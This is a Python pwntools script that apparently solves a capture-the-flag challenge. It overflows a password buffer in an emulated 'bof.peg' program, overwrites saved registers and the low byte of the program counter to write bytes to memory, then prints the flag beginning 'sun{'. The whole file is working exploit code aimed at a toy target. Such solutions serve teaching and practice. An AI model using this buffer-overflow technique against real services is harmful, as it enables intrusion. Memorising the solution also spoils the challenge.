#!/usr/bin/env python3
from pwn import *

# context.log_level = "debug"
context.log_level = "warn"

# Skip the prologue
SAVE_REGS_ADDR = 0x14a
PAGE_TABLE = 0xfc00
WRITE_ADDR = 0xfff6


write_bytes = bytes.fromhex("f88f99f89ceafefffffb")


payload = [0x41] * 50

# R2 will be zero, which means the 10 bytes will be pushed
# to 0xfff6-0xffff

# R3-R7 (10 bytes): Values to write
payload += write_bytes

# R8: Junk
payload += b"R8"

# FP: Junk
payload += b"FP"

# PC: Overwrite just the low byte of PC to jump to @stw
payload += p8(SAVE_REGS_ADDR & 0xff)


password = payload


username = []

# PC: Address to jump to (WRITE_ADDR)
username += p16(WRITE_ADDR)


# r = process(["../../bin/runpeg", "-p", "peg_pwn_checker.so", "bof.peg"]) #"-dvt"
r = remote(os.getenv("SERVER", "localhost"), int(os.getenv("PORT", "10004")))
# r.sendline("b 0x180")
# r.sendline("c")

# r.recvuntil("Enter username: ")
# r.recvuntil(b"WRB (0), ':'\n")
r.sendline(bytes(username))

# r.recvuntil("Enter password for ")
# r.recvuntil(b"WRB (0), ':'\n")
r.sendline(bytes(password))

print(r.recvline_contains("sun{").decode("utf8"))
